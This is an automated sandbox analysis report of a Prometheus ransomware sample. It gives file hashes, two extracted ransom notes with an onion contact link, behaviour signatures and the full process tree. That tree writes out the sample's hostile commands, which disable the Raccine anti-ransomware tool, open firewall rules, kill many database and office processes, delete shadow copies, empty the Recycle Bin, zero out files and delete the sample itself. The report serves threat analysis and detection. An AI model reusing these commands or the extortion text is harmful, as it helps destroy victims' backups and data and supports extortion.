Analysis
-
max time kernel
118s -
max time network
52s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
28-05-2021 06:51
General
-
Target
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
-
Size
233KB
-
MD5
96c565af56a5ba8339f35121bf9ff196
-
SHA1
2edae92d476225b00b4a7ea1e9d7f7ccfda462cb
-
SHA256
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc
-
SHA512
6d4a3d91396bccae3dff43f6ee295980c1919a48f7914d9b8b6eca3e603aa97b8e05a0b78af27e7f1c86691fff6fc26fad69ddb774f8ed5d8011aa87b511b6c1
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
Family
prometheus
Ransom Note
YOUR COMPANY NETWORK HAS BEEN HACKED
All your important files have been encrypted!
Your files are safe! Only modified.(AES)
No software available on internet can help you.
We are the only ones able to decrypt your files.
--------------------------------------------------------------------------------
We also gathered highly confidential/personal data.
These data are currently stored on a private server.
Files are also encrypted and stored securely.
--------------------------------------------------------------------------------
As a result of working with us, you will receive:
Fully automatic decryptor, all your data will be recovered within a few hours after it's run.
Server with your data will be immediately destroyed after your payment.
Save time and continue working.
You will can send us 2-3 non-important files and we will decrypt it
for free to prove we are able to give your files back.
--------------------------------------------------------------------------------
!!!!!!!!!!!!!!!!!!!!!!!!
If you decide not to work with us:
All data on your computers will remain encrypted forever.
YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!
So you can expect your data to be publicly available in the near future..
The price will increase over time.
!!!!!!!!!!!!!!!!!!!!!!!!!
--------------------------------------------------------------------------------
It doesn't matter to us what you choose pay us or we will sell your data.
We only seek money and our goal is not to damage your reputation or prevent your business from running.
Write to us now and we will provide the best prices.
Instructions for contacting us:
____________________________________________________________________________________
You have way:
1) Using a TOR browser!
a. Download and install TOR browser from this site: https://torproject.org/
b. Open the Tor browser. Copy the link: http://promethw27cbrcot.onion/ticket.php?track=LZG-ZNM-YDNM and paste it in the Tor browser.
c. Start a chat and follow the further instructions.
_____________________________________________________________________________________
Attention!
Any attempt to restore your files with third-party software will corrupt it.
Modify or rename files will result in a loose of data.
If you decide to try anyway, make copies before that
Key Identifier:
lmjsYi45FeI8JlfNqcXBmBuQNFVdBGLvfXs3a9aZMC9HdSAUPCjFgF5KWj75mMcPgJ1rGdtwp1wOM5Bur8f3fnaVb03saxWG16YEj6MrquLHlqHv7MGl/O8XeNhcBci1XGi+wI9BzSkr0YHfOjEBXouvhNlVcnkxPhwho+mEmI0f12TpoiVoFSopmM1NK8ZcZimuhcl6sVwNX4rFf9NZGxN729nbPZuwrt2NxjOl7wbuPXVMR8Lf1v29TcaCx3/lit5abmmFgJE0rI9Q/Sx11UOYXcjXWgpTs+dst1xmoajgia/Gf4tp3tSOXHJMdbph2GseTMTuNQOVuP6zKflNJ5VEcj3H5zXs7HrZw2w8b5giAZnu6eKu+xTjXSxIDK76tBTPc9NABiG0pTDjZVGROWIq8oKmvd46hgvqx7ISvfdlBwllXNvkAJd4zJFBi16PfS8LsmWjdhjHMltpemJMcN74sGmQ5QdK09iPdlFydYC56lHjTXKDWGz0guI/Hnw6W7ZD7wF5D2cqsw0HEYc/We/RRLw+TLdeWARhQBKAXzawlTFmAhbu6e5qH3nj++xGIARZG0r74pHodbvUWf7hHEJyeSgQJXv/5qx9k7p1ASJ3otrwZiBs7KR3pyZMsngzQXgyZ4HAegQZH3HYCik7/w9pKy0V0lc6krV4Q9C1nk8=
URLs
http://promethw27cbrcot.onion/ticket.php?track=LZG-ZNM-YDNM
Extracted
Path
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
Family
prometheus
Ransom Note
YOUR COMPANY NETWORK HAS BEEN HACKED
All your important files have been encrypted!
Your files are safe! Only modified.(AES)
No software available on internet can help you.
We are the only ones able to decrypt your files.
We also gathered highly confidential/personal data.
These data are currently stored on a private server.
Files are also encrypted and stored securely.
As a result of working with us, you will receive:
Fully automatic decryptor, all your data will be recovered within a few hours after it’s installation.
Server with your data will be immediately destroyed after your payment.
Save time and continue working.
You will can send us 2-3 non-important files and we will decrypt it
for free to prove we are able to give your files back.
If you decide not to work with us:
All data on your computers will remain encrypted forever.
YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!
So you can expect your data to be publicly available in the near future..
The price will increase over time.
It doesn't matter to us what you choose pay us or we will sell your data.
We only seek money and our goal is not to damage your reputation or prevent your business from running.
Write to us now and we will provide the best prices.
Instructions for contacting us:
You have way:
1) Using a TOR browser!
a. Download and install TOR browser from this site: https://torproject.org/
b. Open the Tor browser. Copy the link: http://promethw27cbrcot.onion/ticket.php?track=LZG-ZNM-YDNM and paste it in the Tor browser.
c. Start a chat and follow the further instructions.
Attention!
Any attempt to restore your files with third-party software will corrupt it.
Modify or rename files will result in a loose of data.
If you decide to try anyway, make copies before that
Key Identifier: lmjsYi45FeI8JlfNqcXBmBuQNFVdBGLvfXs3a9aZMC9HdSAUPCjFgF5KWj75mMcPgJ1rGdtwp1wOM5Bur8f3fnaVb03saxWG16YEj6MrquLHlqHv7MGl/O8XeNhcBci1XGi+wI9BzSkr0YHfOjEBXouvhNlVcnkxPhwho+mEmI0f12TpoiVoFSopmM1NK8ZcZimuhcl6sVwNX4rFf9NZGxN729nbPZuwrt2NxjOl7wbuPXVMR8Lf1v29TcaCx3/lit5abmmFgJE0rI9Q/Sx11UOYXcjXWgpTs+dst1xmoajgia/Gf4tp3tSOXHJMdbph2GseTMTuNQOVuP6zKflNJ5VEcj3H5zXs7HrZw2w8b5giAZnu6eKu+xTjXSxIDK76tBTPc9NABiG0pTDjZVGROWIq8oKmvd46hgvqx7ISvfdlBwllXNvkAJd4zJFBi16PfS8LsmWjdhjHMltpemJMcN74sGmQ5QdK09iPdlFydYC56lHjTXKDWGz0guI/Hnw6W7ZD7wF5D2cqsw0HEYc/We/RRLw+TLdeWARhQBKAXzawlTFmAhbu6e5qH3nj++xGIARZG0r74pHodbvUWf7hHEJyeSgQJXv/5qx9k7p1ASJ3otrwZiBs7KR3pyZMsngzQXgyZ4HAegQZH3HYCik7/w9pKy0V0lc6krV4Q9C1nk8=
URLs
http://promethw27cbrcot.onion/ticket.php?track=LZG-ZNM-YDNM
Signatures
-
Prometheus Ransomware
Ransomware family mostly targeting manufacturing industry and claims to be affiliated with REvil.
-
Downloads MZ/PE file
-
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.
-
Modifies Windows Firewall 1 TTPs
-
Deletes itself 1 IoCs
-
Drops startup file 1 IoCs
-
Modifies WinLogon 2 TTPs 2 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 48 IoCs
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 49 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 4 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe"C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe"1⤵
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\arp.exe"arp" -a2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵
-
C:\Windows\system32\arp.exe"arp" -a2⤵
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta2⤵
- Modifies Internet Explorer settings
-
C:\Windows\system32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe2⤵
- Deletes itself
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.htaFilesize
22KB
MD5c09e7c742e3531ba4c982b035ef6e994
SHA19fbae0889aa69c457a70da69b58aee327fd1c9cc
SHA2565595fdf90977d8d5d34aa7cd47395e9b9292a425f4a6824d1586c2d120cfc6e0
SHA5126e7e789827184c1613d0dfc2397b78d8525ad72631af7d80b1b7d06eac9f06ecebbb2705a578f30dbc162d12def1b74fddcf104cfaab9f9d2e0475cab31f9051
-
memory/268-126-0x0000000000000000-mapping.dmp
-
memory/268-129-0x000000001AB80000-0x000000001AB81000-memory.dmpFilesize
4KB
-
memory/268-128-0x0000000002450000-0x0000000002451000-memory.dmpFilesize
4KB
-
memory/268-133-0x000000001A7A0000-0x000000001A7A1000-memory.dmpFilesize
4KB
-
memory/268-132-0x000000001AB04000-0x000000001AB06000-memory.dmpFilesize
8KB
-
memory/268-131-0x000000001AB00000-0x000000001AB02000-memory.dmpFilesize
8KB
-
memory/268-130-0x00000000026C0000-0x00000000026C1000-memory.dmpFilesize
4KB
-
memory/284-96-0x0000000000000000-mapping.dmp
-
memory/292-106-0x0000000000000000-mapping.dmp
-
memory/320-107-0x0000000000000000-mapping.dmp
-
memory/328-113-0x0000000000000000-mapping.dmp
-
memory/396-89-0x0000000000000000-mapping.dmp
-
memory/436-103-0x0000000000000000-mapping.dmp
-
memory/532-88-0x0000000000000000-mapping.dmp
-
memory/544-68-0x0000000000000000-mapping.dmp
-
memory/572-98-0x0000000000000000-mapping.dmp
-
memory/644-123-0x0000000000000000-mapping.dmp
-
memory/652-67-0x0000000000000000-mapping.dmp
-
memory/672-105-0x0000000000000000-mapping.dmp
-
memory/704-69-0x0000000000000000-mapping.dmp
-
memory/728-75-0x0000000000000000-mapping.dmp
-
memory/728-134-0x0000000000000000-mapping.dmp
-
memory/756-62-0x0000000000000000-mapping.dmp
-
memory/768-74-0x0000000000000000-mapping.dmp
-
memory/776-117-0x0000000000000000-mapping.dmp
-
memory/788-79-0x0000000000000000-mapping.dmp
-
memory/800-72-0x0000000000000000-mapping.dmp
-
memory/824-77-0x0000000000000000-mapping.dmp
-
memory/860-84-0x0000000000000000-mapping.dmp
-
memory/864-66-0x0000000000000000-mapping.dmp
-
memory/864-70-0x000007FEFBD91000-0x000007FEFBD93000-memory.dmpFilesize
8KB
-
memory/892-124-0x0000000000000000-mapping.dmp
-
memory/932-104-0x0000000000000000-mapping.dmp
-
memory/956-118-0x0000000000000000-mapping.dmp
-
memory/980-65-0x0000000000000000-mapping.dmp
-
memory/992-111-0x0000000000000000-mapping.dmp
-
memory/1012-110-0x0000000000000000-mapping.dmp
-
memory/1052-64-0x0000000000000000-mapping.dmp
-
memory/1060-85-0x0000000000000000-mapping.dmp
-
memory/1068-97-0x0000000000000000-mapping.dmp
-
memory/1084-61-0x000000001A970000-0x000000001A972000-memory.dmpFilesize
8KB
-
memory/1084-59-0x00000000008D0000-0x00000000008D1000-memory.dmpFilesize
4KB
-
memory/1088-87-0x0000000000000000-mapping.dmp
-
memory/1112-92-0x0000000000000000-mapping.dmp
-
memory/1120-63-0x0000000000000000-mapping.dmp
-
memory/1144-114-0x0000000000000000-mapping.dmp
-
memory/1160-95-0x0000000000000000-mapping.dmp
-
memory/1184-76-0x0000000000000000-mapping.dmp
-
memory/1248-78-0x0000000000000000-mapping.dmp
-
memory/1300-90-0x0000000000000000-mapping.dmp
-
memory/1308-115-0x0000000000000000-mapping.dmp
-
memory/1348-119-0x0000000000000000-mapping.dmp
-
memory/1360-102-0x0000000000000000-mapping.dmp
-
memory/1432-120-0x0000000000000000-mapping.dmp
-
memory/1476-116-0x0000000000000000-mapping.dmp
-
memory/1516-100-0x0000000000000000-mapping.dmp
-
memory/1540-122-0x0000000000000000-mapping.dmp
-
memory/1596-83-0x0000000000000000-mapping.dmp
-
memory/1600-93-0x0000000000000000-mapping.dmp
-
memory/1612-86-0x0000000000000000-mapping.dmp
-
memory/1616-73-0x0000000000000000-mapping.dmp
-
memory/1620-121-0x0000000000000000-mapping.dmp
-
memory/1688-108-0x0000000000000000-mapping.dmp
-
memory/1704-91-0x0000000000000000-mapping.dmp
-
memory/1708-81-0x0000000000000000-mapping.dmp
-
memory/1716-109-0x0000000000000000-mapping.dmp
-
memory/1728-71-0x0000000000000000-mapping.dmp
-
memory/1756-112-0x0000000000000000-mapping.dmp
-
memory/1912-99-0x0000000000000000-mapping.dmp
-
memory/1932-101-0x0000000000000000-mapping.dmp
-
memory/1956-125-0x0000000000000000-mapping.dmp
-
memory/1964-82-0x0000000000000000-mapping.dmp
-
memory/2028-94-0x0000000000000000-mapping.dmp